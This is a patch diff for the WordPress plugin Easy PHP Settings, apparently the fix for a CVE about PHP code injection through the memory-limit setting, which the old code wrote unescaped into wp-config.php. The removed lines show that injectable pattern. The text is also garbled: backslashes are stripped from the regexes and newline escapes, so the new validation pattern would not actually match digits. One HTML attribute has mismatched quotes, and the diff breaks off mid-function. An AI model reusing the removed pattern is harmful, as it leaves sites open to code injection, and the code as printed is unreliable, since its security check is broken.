CVE-2026-3352: Easy PHP Settings <= 1.0.4 – Authenticated (Administrator+) PHP Code Injection via 'wp_memory_limit' Setting (easy-php-settings)

--- a/easy-php-settings/class-easy-php-settings.php
+++ b/easy-php-settings/class-easy-php-settings.php
@@ -3,7 +3,7 @@
  * Plugin Name: Easy PHP Settings
  * Plugin URI:  https://github.com/easy-php-settings
  * Description: An easy way to manage common PHP INI settings from the WordPress admin panel.
- * Version:     1.0.4
+ * Version:     1.0.5
  * Author:      H M Shahadul Islam
  * Author URI:  https://github.com/shahadul878
  * License:     GPL-2.0+
@@ -23,6 +23,11 @@
 require_once plugin_dir_path( __FILE__ ) . 'includes/class-easyinifile.php';
 require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-settings-history.php';
 require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-extensions-viewer.php';
+require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-config-backup.php';
+require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-config-parser.php';
+require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-error-handler.php';
+require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-settings-validator.php';
+require_once plugin_dir_path( __FILE__ ) . 'includes/class-easy-settings-cache.php';

 /**
  * Class Easy_PHP_Settings
@@ -81,7 +86,7 @@
 	 *
 	 * @var string
 	 */
-	private $version = '1.0.4';
+	private $version = '1.0.5';

 	/**
 	 * Setting tooltips
@@ -393,7 +398,18 @@

 		foreach ( $this->settings_keys as $key ) {
 			if ( isset( $input[ $key ] ) ) {
-				$new_input[ $key ] = sanitize_text_field( $input[ $key ] );
+				$sanitized = Easy_Settings_Validator::sanitize_setting( $key, $input[ $key ] );
+				$validation = Easy_Settings_Validator::validate_setting( $key, $sanitized );
+				if ( is_wp_error( $validation ) ) {
+					Easy_Error_Handler::add_settings_error(
+						'easy_php_settings_settings',
+						'validation_error_' . $key,
+						$validation->get_error_message(),
+						'error'
+					);
+					continue;
+				}
+				$new_input[ $key ] = $sanitized;
 			}
 		}

@@ -402,15 +418,34 @@
 			$new_input['custom_php_ini'] = trim( $input['custom_php_ini'] );
 		}

-		// Validate settings and show warnings.
+		// Validate settings relationships and show warnings.
+		$relationship_errors = Easy_Settings_Validator::validate_settings_relationships( $new_input );
+		foreach ( $relationship_errors as $error ) {
+			add_settings_error( 'easy_php_settings_settings', 'relationship_warning', $error, 'warning' );
+		}
+
+		// Also run legacy validation for backward compatibility.
 		$this->validate_settings( $new_input );

 		// Track history.
 		Easy_Settings_History::add_entry( $old_input, $new_input, 'php_settings' );

+		// Invalidate cache when settings change.
+		Easy_Settings_Cache::invalidate( 'settings' );
+
 		// Auto-generate configuration files when settings are saved.
 		if ( ! empty( $new_input ) ) {
-			$this->generate_config_files( $new_input );
+			try {
+				$this->generate_config_files( $new_input );
+			} catch ( Exception $e ) {
+				Easy_Error_Handler::handle_exception( $e, 'generate_config_files' );
+				Easy_Error_Handler::add_settings_error(
+					'easy_php_settings_settings',
+					'config_generation_error',
+					__( 'Failed to generate configuration files. Please check error log.', 'easy-php-settings' ),
+					'error'
+				);
+			}
 		}

 		return $new_input;
@@ -428,7 +463,18 @@

 		foreach ( $this->wp_memory_settings_keys as $key ) {
 			if ( isset( $input[ $key ] ) ) {
-				$new_input[ $key ] = sanitize_text_field( $input[ $key ] );
+				$sanitized = Easy_Settings_Validator::sanitize_setting( $key, $input[ $key ] );
+				$validation = Easy_Settings_Validator::validate_wp_memory_setting( $key, $sanitized );
+				if ( is_wp_error( $validation ) ) {
+					Easy_Error_Handler::add_settings_error(
+						'easy_php_settings_wp_memory_settings',
+						'validation_error_' . $key,
+						$validation->get_error_message(),
+						'error'
+					);
+					continue;
+				}
+				$new_input[ $key ] = $sanitized;
 			}
 		}

@@ -437,7 +483,17 @@

 		// Update wp-config.php with WordPress memory settings.
 		if ( ! empty( $new_input ) ) {
-			$this->update_wp_memory_constants( $new_input );
+			try {
+				$this->update_wp_memory_constants( $new_input );
+			} catch ( Exception $e ) {
+				Easy_Error_Handler::handle_exception( $e, 'update_wp_memory_constants' );
+				Easy_Error_Handler::add_settings_error(
+					'easy_php_settings_wp_memory_settings',
+					'config_update_error',
+					__( 'Failed to update wp-config.php. Please check error log.', 'easy-php-settings' ),
+					'error'
+				);
+			}
 		}

 		return $new_input;
@@ -470,8 +526,14 @@
 		$files_written = EasyIniFile::write( $user_ini_content );

 		// Show success/error messages.
-		if ( ! empty( $files_written ) ) {
-
+		if ( is_wp_error( $files_written ) ) {
+			Easy_Error_Handler::add_settings_error(
+				'easy_php_settings_settings',
+				'config_files_error',
+				$files_written->get_error_message(),
+				'error'
+			);
+		} elseif ( ! empty( $files_written ) && is_array( $files_written ) ) {
 			$message = sprintf(
 			/* translators: %s: List of written INI file names. */
 				__( 'Settings saved and written to: %s. Please restart your web server for changes to take effect.', 'easy-php-settings' ),
@@ -496,8 +558,14 @@

 			$files_deleted = EasyIniFile::remove_files();

-			if ( ! empty( $files_deleted ) ) {
-
+			if ( is_wp_error( $files_deleted ) ) {
+				Easy_Error_Handler::add_settings_error(
+					'easy_php_settings_settings',
+					'files_deleted_error',
+					$files_deleted->get_error_message(),
+					'error'
+				);
+			} elseif ( ! empty( $files_deleted ) && is_array( $files_deleted ) ) {
 				$message = sprintf(
 				/* translators: %s: List of deleted INI file names. */
 					__( 'Successfully deleted: %s.', 'easy-php-settings' ),
@@ -527,7 +595,13 @@
 		$access        = $all_settings[ $key ]['access'] ?? 0;
 		$is_changeable = ( INI_USER === $access || INI_ALL === $access );

-		echo "<input type='text' name='easy_php_settings_settings[" . esc_attr( $key ) . "]' value='" . esc_attr( $value ) . "' class='regular-text' placeholder='" . esc_attr( $this->recommended_values[ $key ] ?? '' ) . "'>";
+		$field_id = 'easy_php_settings_' . esc_attr( $key );
+		$aria_label = sprintf(
+			/* translators: %s: Setting name */
+			__( 'Enter value for %s', 'easy-php-settings' ),
+			esc_attr( $key )
+		);
+		echo "<input type='text' id='" . esc_attr( $field_id ) . "' name='easy_php_settings_settings[" . esc_attr( $key ) . "]' value='" . esc_attr( $value ) . "' class='regular-text' placeholder='" . esc_attr( $this->recommended_values[ $key ] ?? '' ) . "' aria-label='" . esc_attr( $aria_label ) . "' aria-describedby='" . esc_attr( $field_id ) . '_description">';

 		$this->render_status_indicator( $key, $current_value );

@@ -551,7 +625,13 @@
 		$value         = isset( $options[ $key ] ) ? $options[ $key ] : '';
 		$current_value = $this->get_wp_memory_value( $key );

-		echo "<input type='text' name='easy_php_settings_wp_memory_settings[" . esc_attr( $key ) . "]' value='" . esc_attr( $value ) . "' class='regular-text' placeholder='" . esc_attr( $this->wp_memory_recommended_values[ $key ] ?? '' ) . "'>";
+		$field_id = 'easy_php_settings_wp_memory_' . esc_attr( $key );
+		$aria_label = sprintf(
+			/* translators: %s: Setting name */
+			__( 'Enter value for %s', 'easy-php-settings' ),
+			esc_attr( $key )
+		);
+		echo "<input type='text' id='" . esc_attr( $field_id ) . "' name='easy_php_settings_wp_memory_settings[" . esc_attr( $key ) . "]' value='" . esc_attr( $value ) . "' class='regular-text' placeholder='" . esc_attr( $this->wp_memory_recommended_values[ $key ] ?? '' ) . "' aria-label='" . esc_attr( $aria_label ) . "' aria-describedby='" . esc_attr( $field_id ) . '_description">';

 		$this->render_wp_memory_status_indicator( $key, $current_value );
 	}
@@ -564,6 +644,7 @@
 	 * @return void
 	 */
 	private function render_status_indicator( $key, $current_value ) {
+		$field_id = 'easy_php_settings_' . esc_attr( $key );
 		/* translators: %s: Current PHP value */
 		$description = sprintf( esc_html__( 'Current value: %s', 'easy-php-settings' ), esc_html( $current_value ) );
 		if ( isset( $this->recommended_values[ $key ] ) ) {
@@ -576,12 +657,12 @@
 			$recommended_val_bytes = $this->convert_to_bytes( $recommended_value_str );

 			if ( $current_val_bytes < $recommended_val_bytes ) {
-				$description .= ' <span style="color: red;">' . esc_html__( '(Low)', 'easy-php-settings' ) . '</span>';
+				$description .= ' <span style="color: red;" aria-label="' . esc_attr__( 'Low value', 'easy-php-settings' ) . '">' . esc_html__( '(Low)', 'easy-php-settings' ) . '</span>';
 			} else {
-				$description .= ' <span style="color: green;">' . esc_html__( '(OK)', 'easy-php-settings' ) . '</span>';
+				$description .= ' <span style="color: green;" aria-label="' . esc_attr__( 'OK value', 'easy-php-settings' ) . '">' . esc_html__( '(OK)', 'easy-php-settings' ) . '</span>';
 			}
 		}
-		echo '<p class="description">' . wp_kses_post( $description ) . '</p>';
+		echo '<p class="description" id="' . esc_attr( $field_id ) . '_description" role="status">' . wp_kses_post( $description ) . '</p>';
 	}

 	/**
@@ -609,6 +690,7 @@
 	 * @return void
 	 */
 	private function render_wp_memory_status_indicator( $key, $current_value ) {
+		$field_id = 'easy_php_settings_wp_memory_' . esc_attr( $key );
 		/* translators: %s: Current WordPress memory value */
 		$description = sprintf( esc_html__( 'Current value: %s', 'easy-php-settings' ), esc_html( $current_value ) );
 		if ( isset( $this->wp_memory_recommended_values[ $key ] ) ) {
@@ -621,12 +703,12 @@
 			$recommended_val_bytes = $this->convert_to_bytes( $recommended_value_str );

 			if ( $current_val_bytes < $recommended_val_bytes ) {
-				$description .= ' <span style="color: red;">' . esc_html__( '(Low)', 'easy-php-settings' ) . '</span>';
+				$description .= ' <span style="color: red;" aria-label="' . esc_attr__( 'Low value', 'easy-php-settings' ) . '">' . esc_html__( '(Low)', 'easy-php-settings' ) . '</span>';
 			} else {
-				$description .= ' <span style="color: green;">' . esc_html__( '(OK)', 'easy-php-settings' ) . '</span>';
+				$description .= ' <span style="color: green;" aria-label="' . esc_attr__( 'OK value', 'easy-php-settings' ) . '">' . esc_html__( '(OK)', 'easy-php-settings' ) . '</span>';
 			}
 		}
-		echo '<p class="description">' . wp_kses_post( $description ) . '</p>';
+		echo '<p class="description" id="' . esc_attr( $field_id ) . '_description" role="status">' . wp_kses_post( $description ) . '</p>';
 	}

 	/**
@@ -829,40 +911,82 @@
 			}

 			if ( ! isset( $_FILES['import_file'] ) || empty( $_FILES['import_file']['tmp_name'] ) ) {
-				add_settings_error( 'easy_php_settings_settings', 'import_no_file', __( 'No file selected for import.', 'easy-php-settings' ), 'error' );
+				Easy_Error_Handler::add_settings_error(
+					'easy_php_settings_settings',
+					'import_no_file',
+					__( 'No file selected for import.', 'easy-php-settings' ),
+					'error'
+				);
 				return;
 			}

-			global $wp_filesystem;
-			if ( ! $wp_filesystem ) {
-				require_once ABSPATH . 'wp-admin/includes/file.php';
-				WP_Filesystem();
-			}
+			try {
+				// Validate uploaded file.
+				$file_validation = Easy_Settings_Validator::validate_import_file( $_FILES['import_file'] );
+				if ( is_wp_error( $file_validation ) ) {
+					throw new Exception( $file_validation->get_error_message() );
+				}

-			$json_data = $wp_filesystem->get_contents( $_FILES['import_file']['tmp_name'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
-			$settings  = json_decode( $json_data, true );
+				global $wp_filesystem;
+				if ( ! $wp_filesystem ) {
+					require_once ABSPATH . 'wp-admin/includes/file.php';
+					WP_Filesystem();
+				}

-			if ( ! $settings || ! is_array( $settings ) ) {
-				add_settings_error( 'easy_php_settings_settings', 'import_invalid', __( 'Invalid settings file format.', 'easy-php-settings' ), 'error' );
-				return;
-			}
+				$json_data = $wp_filesystem->get_contents( $_FILES['import_file']['tmp_name'] );
+				if ( false === $json_data ) {
+					throw new Exception( __( 'Failed to read import file.', 'easy-php-settings' ) );
+				}

-			// Create backup before importing.
-			$backup = array(
-				'php_settings' => $this->get_option( 'easy_php_settings_settings', array() ),
-				'wp_memory'    => $this->get_option( 'easy_php_settings_wp_memory_settings', array() ),
-			);
-			$this->update_option( 'easy_php_settings_import_backup', $backup );
+				$settings = json_decode( $json_data, true );
+				if ( ! $settings || ! is_array( $settings ) ) {
+					throw new Exception( __( 'Invalid settings file format.', 'easy-php-settings' ) );
+				}

-			// Import settings.
-			if ( isset( $settings['php_settings'] ) ) {
-				$this->update_option( 'easy_php_settings_settings', $settings['php_settings'] );
-			}
-			if ( isset( $settings['wp_memory'] ) ) {
-				$this->update_option( 'easy_php_settings_wp_memory_settings', $settings['wp_memory'] );
-			}
+				// Validate imported settings.
+				if ( isset( $settings['php_settings'] ) && is_array( $settings['php_settings'] ) ) {
+					foreach ( $settings['php_settings'] as $key => $value ) {
+						if ( in_array( $key, $this->settings_keys, true ) ) {
+							$validation = Easy_Settings_Validator::validate_setting( $key, $value );
+							if ( is_wp_error( $validation ) ) {
+								throw new Exception( sprintf( __( 'Invalid value for %s: %s', 'easy-php-settings' ), $key, $validation->get_error_message() ) );
+							}
+						}
+					}
+				}
+
+				// Create backup before importing.
+				$backup = array(
+					'php_settings' => $this->get_option( 'easy_php_settings_settings', array() ),
+					'wp_memory'    => $this->get_option( 'easy_php_settings_wp_memory_settings', array() ),
+				);
+				$this->update_option( 'easy_php_settings_import_backup', $backup );
+
+				// Import settings.
+				if ( isset( $settings['php_settings'] ) ) {
+					$this->update_option( 'easy_php_settings_settings', $settings['php_settings'] );
+					Easy_Settings_Cache::invalidate( 'settings' );
+				}
+				if ( isset( $settings['wp_memory'] ) ) {
+					$this->update_option( 'easy_php_settings_wp_memory_settings', $settings['wp_memory'] );
+				}
+
+				add_settings_error(
+					'easy_php_settings_settings',
+					'import_success',
+					__( 'Settings imported successfully. A backup of your previous settings was created.', 'easy-php-settings' ),
+					'updated'
+				);

-			add_settings_error( 'easy_php_settings_settings', 'import_success', __( 'Settings imported successfully. A backup of your previous settings was created.', 'easy-php-settings' ), 'updated' );
+			} catch ( Exception $e ) {
+				Easy_Error_Handler::handle_exception( $e, 'handle_export_import' );
+				Easy_Error_Handler::add_settings_error(
+					'easy_php_settings_settings',
+					'import_error',
+					__( 'Failed to import settings. Please check error log.', 'easy-php-settings' ),
+					'error'
+				);
+			}
 		}
 	}

@@ -1487,7 +1611,14 @@
 	 * @return void
 	 */
 	public function render_history_tab() {
-		$history = Easy_Settings_History::get_history();
+		// Pagination parameters.
+		$per_page = 20;
+		$current_page = isset( $_GET['history_page'] ) ? max( 1, intval( $_GET['history_page'] ) ) : 1;
+		$offset = ( $current_page - 1 ) * $per_page;
+
+		$total_count = Easy_Settings_History::get_history_count();
+		$history = Easy_Settings_History::get_history( $per_page, $offset );
+		$total_pages = ceil( $total_count / $per_page );
 		?>
 		<div id="history-tab">
 			<h3><?php esc_html_e( 'Settings Change History', 'easy-php-settings' ); ?></h3>
@@ -1544,6 +1675,37 @@
 						<?php endforeach; ?>
 					</tbody>
 				</table>
+
+				<?php if ( $total_pages > 1 ) : ?>
+				<div class="tablenav">
+					<div class="tablenav-pages">
+						<span class="displaying-num">
+							<?php
+							printf(
+								/* translators: %d: Total number of items */
+								esc_html( _n( '%d item', '%d items', $total_count, 'easy-php-settings' ) ),
+								esc_html( $total_count )
+							);
+							?>
+						</span>
+						<?php
+						$page_links = paginate_links(
+							array(
+								'base'      => add_query_arg( 'history_page', '%#%' ),
+								'format'    => '',
+								'prev_text' => __( '«', 'easy-php-settings' ),
+								'next_text' => __( '»', 'easy-php-settings' ),
+								'total'     => $total_pages,
+								'current'   => $current_page,
+							)
+						);
+						if ( $page_links ) {
+							echo '<span class="pagination-links">' . wp_kses_post( $page_links ) . '</span>';
+						}
+						?>
+					</div>
+				</div>
+				<?php endif; ?>
 			<?php endif; ?>
 		</div>
 		<?php
@@ -1743,31 +1905,86 @@

 		$config_path = ABSPATH . 'wp-config.php';
 		if ( ! $wp_filesystem->is_writable( $config_path ) ) {
-			add_settings_error( 'easy_php_settings_debugging_settings', 'config_not_writable', __( 'wp-config.php is not writable.', 'easy-php-settings' ), 'error' );
+			Easy_Error_Handler::add_settings_error(
+				'easy_php_settings_debugging_settings',
+				'config_not_writable',
+				__( 'wp-config.php is not writable.', 'easy-php-settings' ),
+				'error'
+			);
 			return get_option( 'easy_php_settings_debugging_settings' );
 		}

-		$config_content = $wp_filesystem->get_contents( $config_path );
-		$constants      = array( 'WP_DEBUG', 'WP_DEBUG_LOG', 'WP_DEBUG_DISPLAY', 'SCRIPT_DEBUG' );
+		// Create backup before modification.
+		$backup_result = Easy_Config_Backup::create_backup();
+		if ( is_wp_error( $backup_result ) ) {
+			Easy_Error_Handler::log_error(
+				$backup_result->get_error_message(),
+				'create_backup',
+				'warning'
+			);
+			// Continue anyway, but log the warning.
+		}

-		$new_options = get_option( 'easy_php_settings_debugging_settings', array() );
+		try {
+			$config_content = $wp_filesystem->get_contents( $config_path );
+			if ( false === $config_content ) {
+				throw new Exception( __( 'Failed to read wp-config.php file.', 'easy-php-settings' ) );
+			}

-		foreach ( $constants as $const ) {
-			$key   = strtolower( $const );
-			$value = isset( $input[ $key ] ) ? 'true' : 'false';
+			$constants      = array( 'WP_DEBUG', 'WP_DEBUG_LOG', 'WP_DEBUG_DISPLAY', 'SCRIPT_DEBUG' );
+			$new_options     = get_option( 'easy_php_settings_debugging_settings', array() );
+			$original_content = $config_content;

-			if ( preg_match( '/define(s*'' . $const . ''s*,s*(true|false)s*);/i', $config_content ) ) {
-				$config_content = preg_replace( '/define(s*'' . $const . ''s*,s*(true|false)s*);/i', "define( '$const', $value );", $config_content );
-			} else {
-				$config_content = str_replace( "/* That's all, stop editing!", "define( '$const', $value );nn/* That's all, stop editing!", $config_content );
+			foreach ( $constants as $const ) {
+				$key   = strtolower( $const );
+				$value = isset( $input[ $key ] ) ? true : false;
+
+				$result = Easy_Config_Parser::update_constant( $config_content, $const, $value, 'bool' );
+				if ( is_wp_error( $result ) ) {
+					throw new Exception( $result->get_error_message() );
+				}
+				$config_content = $result;
+				$new_options[ $key ] = $value;
 			}

-			$new_options[ $key ] = 'true' === $value;
-		}
+			// Validate the modified content.
+			$validation = Easy_Config_Backup::validate_config_structure( $config_content );
+			if ( is_wp_error( $validation ) ) {
+				// Restore from backup if validation fails.
+				$latest_backup = Easy_Config_Backup::get_latest_backup();
+				if ( $latest_backup ) {
+					Easy_Config_Backup::restore_backup( $latest_backup['key'] );
+				}
+				throw new Exception( $validation->get_error_message() );
+			}

-		$wp_filesystem->put_contents( $config_path, $config_content );
+			// Write the modified content.
+			$write_result = $wp_filesystem->put_contents( $config_path, $config_content );
+			if ( ! $write_result ) {
+				// Restore from backup if write fails.
+				$latest_backup = Easy_Config_Backup::get_latest_backup();
+				if ( $latest_backup ) {
+					Easy_Config_Backup::restore_backup( $latest_backup['key'] );
+				}
+				throw new Exception( __( 'Failed to write wp-config.php file.', 'easy-php-settings' ) );
+			}

-		add_settings_error( 'easy_php_settings_debugging_settings', 'settings_updated', __( 'Debugging settings updated successfully.', 'easy-php-settings' ), 'updated' );
+			add_settings_error(
+				'easy_php_settings_debugging_settings',
+				'settings_updated',
+				__( 'Debugging settings updated successfully.', 'easy-php-settings' ),
+				'updated'
+			);
+
+		} catch ( Exception $e ) {
+			Easy_Error_Handler::handle_exception( $e, 'update_wp_config_constants' );
+			Easy_Error_Handler::add_settings_error(
+				'easy_php_settings_debugging_settings',
+				'config_update_error',
+				__( 'Failed to update wp-config.php. Please check error log.', 'easy-php-settings' ),
+				'error'
+			);
+		}

 		return $new_options;
 	}
@@ -1787,29 +2004,106 @@

 		$config_path = ABSPATH . 'wp-config.php';
 		if ( ! $wp_filesystem->is_writable( $config_path ) ) {
-			add_settings_error( 'easy_php_settings_wp_memory_settings', 'config_not_writable', __( 'wp-config.php is not writable.', 'easy-php-settings' ), 'error' );
+			Easy_Error_Handler::add_settings_error(
+				'easy_php_settings_wp_memory_settings',
+				'config_not_writable',
+				__( 'wp-config.php is not writable.', 'easy-php-settings' ),
+				'error'
+			);
 			return;
 		}

-		$config_content = $wp_filesystem->get_contents( $config_path );
-		$constants      = array( 'WP_MEMORY_LIMIT', 'WP_MAX_MEMORY_LIMIT' );
+		// Create backup before modification.
+		$backup_result = Easy_Config_Backup::create_backup();
+		if ( is_wp_error( $backup_result ) ) {
+			Easy_Error_Handler::log_error(
+				$backup_result->get_error_message(),
+				'create_backup',
+				'warning'
+			);
+			// Continue anyway, but log the warning.
+		}
+
+		try {
+			$config_content = $wp_filesystem->get_contents( $config_path );
+			if ( false === $config_content ) {
+				throw new Exception( __( 'Failed to read wp-config.php file.', 'easy-php-settings' ) );
+			}
+
+			$constants = array( 'WP_MEMORY_LIMIT', 'WP_MAX_MEMORY_LIMIT' );
+
+			foreach ( $constants as $const ) {
+				$key = strtolower( $const );
+				if ( isset( $input[ $key ] ) && ! empty( $input[ $key ] ) ) {
+					$value = $input[ $key ];
+
+					// Security: Strict validation to prevent code injection
+					// Only allow digits followed by optional K, M, G, or T unit
+					$trimmed_value = trim( $value );
+					if ( ! preg_match( '/^(d+)([KMGT]?)$/i', $trimmed_value ) ) {
+						throw new Exception(
+							sprintf(
+								/* translators: %s: Setting name */
+								__( 'Invalid value format for %s. Only numbers and K/M/G/T units are allowed.', 'easy-php-settings' ),
+								$const
+							)
+						);
+					}
+
+					// Re-sanitize to ensure no malicious characters remain
+					$sanitized_value = preg_replace( '/[^0-9KMGT]/i', '', $trimmed_value );

-		foreach ( $constants as $const ) {
-			$key = strtolower( $const );
-			if ( isset( $input[ $key ] ) && ! empty( $input[ $key ] ) ) {
-				$value = "'" . $input[ $key ] . "'";
-
-				if ( preg_match( '/define(s*'' . $const . ''s*,s*'.*?'s*);/i', $config_content ) ) {
-					$config_content = preg_replace( '/define(s*'' . $const . ''s*,s*'.*?'s*);/i', "define( '$const', $value );", $config_content );
-				} else {
-					$config_content = str_replace( "/* That's all, stop editing!", "define( '$const', $value );nn/* That's all, stop editing!", $config_content );
+					// Additional validation using the validator
+					$validation = Easy_Settings_Validator::validate_wp_memory_setting( $key, $sanitized_value );
+					if ( is_wp_error( $validation ) ) {
+						throw new Exception( $validation->get_error_message() );
+					}
+					$result = Easy_Config_Parser::update_constant( $config_content, $const, $sanitized_value, 'string' );
+					if ( is_wp_error( $result ) ) {
+						throw new Exception( $result->get_error_message() );
+					}
+					$config_content = $result;
 				}
 			}
-		}

-		$wp_filesystem->put_contents( $config_path, $config_content );
+			// Validate the modified content.
+			$validation = Easy_Config_Backup::validate_config_structure( $config_content );
+			if ( is_wp_error( $validation ) ) {
+				// Restore from backup if validation fails.
+				$latest_backup = Easy_Config_Backup::get_latest_backup();
+				if ( $latest_backup ) {
+					Easy_Config_Backup::restore_backup( $latest_backup['key'] );
+				}
+				throw new Exception( $validation->get_error_message() );
+			}
+
+			// Write the modified content.
+			$write_result = $wp_filesystem->put_contents( $config_path, $config_content );
+			if ( ! $write_result ) {
+				// Restore from backup if write fails.
+				$latest_backup = Easy_Config_Backup::get_latest_backup();
+				if ( $latest_backup ) {
+					Easy_Config_Backup::restore_backup( $latest_backup['key'] );
+				}
+				throw new Exception( __( 'Failed to write wp-config.php file.', 'easy-php-settings' ) );
+			}

-		add_settings_error( 'easy_php_settings_wp_memory_settings', 'wp_memory_updated', __( 'WordPress memory settings updated successfully in wp-config.php.', 'easy-php-settings' ), 'updated' );
+			add_settings_error(
+				'easy_php_settings_wp_memory_settings',
+				'wp_memory_updated',
+				__( 'WordPress memory settings updated successfully in wp-config.php.', 'easy-php-settings' ),
+				'updated'
+			);
+
+		} catch ( Exception $e ) {
+			Easy_Error_Handler::handle_exception( $e, 'update_wp_memory_constants' );
+			Easy_Error_Handler::add_settings_error(
+				'easy_php_settings_wp_memory_settings',
+				'config_update_error',
+				__( 'Failed to update wp-config.php. Please check error log.', 'easy-php-settings' ),
+				'error'
+			);
+		}
 	}

 	/**
--- a/easy-php-settings/includes/class-easy-config-backup.php
+++ b/easy-php-settings/includes/class-easy-config-backup.php
@@ -0,0 +1,241 @@
+<?php
+/**
+ * Config Backup class for easy-php-settings plugin
+ *
+ * @package EasyPHPSettings
+ * @since 1.0.5
+ */
+
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+/**
+ * Easy_Config_Backup class
+ *
+ * Handles backup and restore of wp-config.php file.
+ *
+ * @package EasyPHPSettings
+ * @since 1.0.5
+ */
+class Easy_Config_Backup {
+
+	/**
+	 * Backup option key prefix
+	 *
+	 * @var string
+	 */
+	const BACKUP_OPTION_PREFIX = 'easy_php_settings_config_backup_';
+
+	/**
+	 * Maximum number of backups to keep
+	 *
+	 * @var int
+	 */
+	const MAX_BACKUPS = 5;
+
+	/**
+	 * Constructor
+	 */
+	private function __construct() {}
+
+	/**
+	 * Create a backup of wp-config.php before modification
+	 *
+	 * @return bool|WP_Error True on success, WP_Error on failure.
+	 */
+	public static function create_backup() {
+		global $wp_filesystem;
+		if ( ! $wp_filesystem ) {
+			require_once ABSPATH . 'wp-admin/includes/file.php';
+			WP_Filesystem();
+		}
+
+		$config_path = ABSPATH . 'wp-config.php';
+		if ( ! $wp_filesystem->exists( $config_path ) ) {
+			return new WP_Error( 'config_not_found', __( 'wp-config.php file not found.', 'easy-php-settings' ) );
+		}
+
+		if ( ! $wp_filesystem->is_readable( $config_path ) ) {
+			return new WP_Error( 'config_not_readable', __( 'wp-config.php file is not readable.', 'easy-php-settings' ) );
+		}
+
+		$config_content = $wp_filesystem->get_contents( $config_path );
+		if ( false === $config_content ) {
+			return new WP_Error( 'config_read_failed', __( 'Failed to read wp-config.php file.', 'easy-php-settings' ) );
+		}
+
+		// Create backup entry.
+		$backup_data = array(
+			'timestamp' => current_time( 'mysql' ),
+			'content'   => $config_content,
+			'user_id'   => get_current_user_id(),
+		);
+
+		$backup_key = self::BACKUP_OPTION_PREFIX . time();
+		$saved      = is_multisite() ? update_site_option( $backup_key, $backup_data ) : update_option( $backup_key, $backup_data );
+
+		if ( ! $saved ) {
+			return new WP_Error( 'backup_save_failed', __( 'Failed to save backup.', 'easy-php-settings' ) );
+		}
+
+		// Clean up old backups.
+		self::cleanup_old_backups();
+
+		return true;
+	}
+
+	/**
+	 * Restore wp-config.php from backup
+	 *
+	 * @param string $backup_key The backup key to restore from.
+	 * @return bool|WP_Error True on success, WP_Error on failure.
+	 */
+	public static function restore_backup( $backup_key ) {
+		global $wp_filesystem;
+		if ( ! $wp_filesystem ) {
+			require_once ABSPATH . 'wp-admin/includes/file.php';
+			WP_Filesystem();
+		}
+
+		$backup_data = is_multisite() ? get_site_option( $backup_key ) : get_option( $backup_key );
+
+		if ( ! $backup_data || ! isset( $backup_data['content'] ) ) {
+			return new WP_Error( 'backup_not_found', __( 'Backup not found.', 'easy-php-settings' ) );
+		}
+
+		$config_path = ABSPATH . 'wp-config.php';
+		if ( ! $wp_filesystem->is_writable( $config_path ) ) {
+			return new WP_Error( 'config_not_writable', __( 'wp-config.php is not writable.', 'easy-php-settings' ) );
+		}
+
+		$result = $wp_filesystem->put_contents( $config_path, $backup_data['content'] );
+		if ( ! $result ) {
+			return new WP_Error( 'restore_failed', __( 'Failed to restore backup.', 'easy-php-settings' ) );
+		}
+
+		return true;
+	}
+
+	/**
+	 * Get the latest backup
+	 *
+	 * @return array|null Backup data or null if no backup exists.
+	 */
+	public static function get_latest_backup() {
+		$backups = self::get_all_backups();
+		if ( empty( $backups ) ) {
+			return null;
+		}
+
+		// Sort by timestamp descending.
+		usort(
+			$backups,
+			function( $a, $b ) {
+				return strtotime( $b['timestamp'] ) - strtotime( $a['timestamp'] );
+			}
+		);
+
+		return $backups[0];
+	}
+
+	/**
+	 * Get all backups
+	 *
+	 * @return array Array of backup data.
+	 */
+	public static function get_all_backups() {
+		global $wpdb;
+		$backups = array();
+
+		if ( is_multisite() ) {
+			$options = $wpdb->get_results(
+				$wpdb->prepare(
+					"SELECT option_name, option_value FROM {$wpdb->sitemeta} WHERE option_name LIKE %s",
+					$wpdb->esc_like( self::BACKUP_OPTION_PREFIX ) . '%'
+				),
+				ARRAY_A
+			);
+		} else {
+			$options = $wpdb->get_results(
+				$wpdb->prepare(
+					"SELECT option_name, option_value FROM {$wpdb->options} WHERE option_name LIKE %s",
+					$wpdb->esc_like( self::BACKUP_OPTION_PREFIX ) . '%'
+				),
+				ARRAY_A
+			);
+		}
+
+		foreach ( $options as $option ) {
+			$backup_data = maybe_unserialize( $option['option_value'] );
+			if ( is_array( $backup_data ) && isset( $backup_data['timestamp'] ) ) {
+				$backups[] = array_merge(
+					$backup_data,
+					array( 'key' => $option['option_name'] )
+				);
+			}
+		}
+
+		return $backups;
+	}
+
+	/**
+	 * Clean up old backups, keeping only the most recent ones
+	 *
+	 * @return void
+	 */
+	private static function cleanup_old_backups() {
+		$backups = self::get_all_backups();
+
+		if ( count( $backups ) <= self::MAX_BACKUPS ) {
+			return;
+		}
+
+		// Sort by timestamp descending.
+		usort(
+			$backups,
+			function( $a, $b ) {
+				return strtotime( $b['timestamp'] ) - strtotime( $a['timestamp'] );
+			}
+		);
+
+		// Delete old backups.
+		$backups_to_delete = array_slice( $backups, self::MAX_BACKUPS );
+		foreach ( $backups_to_delete as $backup ) {
+			if ( isset( $backup['key'] ) ) {
+				is_multisite() ? delete_site_option( $backup['key'] ) : delete_option( $backup['key'] );
+			}
+		}
+	}
+
+	/**
+	 * Validate wp-config.php structure
+	 *
+	 * @param string $content The config file content.
+	 * @return bool|WP_Error True if valid, WP_Error if invalid.
+	 */
+	public static function validate_config_structure( $content ) {
+		// Check for PHP opening tag.
+		if ( strpos( $content, '<?php' ) === false ) {
+			return new WP_Error( 'invalid_php_tag', __( 'Config file must start with <?php tag.', 'easy-php-settings' ) );
+		}
+
+		// Check for basic WordPress constants.
+		$required_constants = array( 'DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST' );
+		foreach ( $required_constants as $constant ) {
+			if ( strpos( $content, "define( '{$constant}'" ) === false && strpos( $content, 'define( "' . $constant . '"' ) === false ) {
+				return new WP_Error( 'missing_constant', sprintf( __( 'Required constant %s not found in config file.', 'easy-php-settings' ), $constant ) );
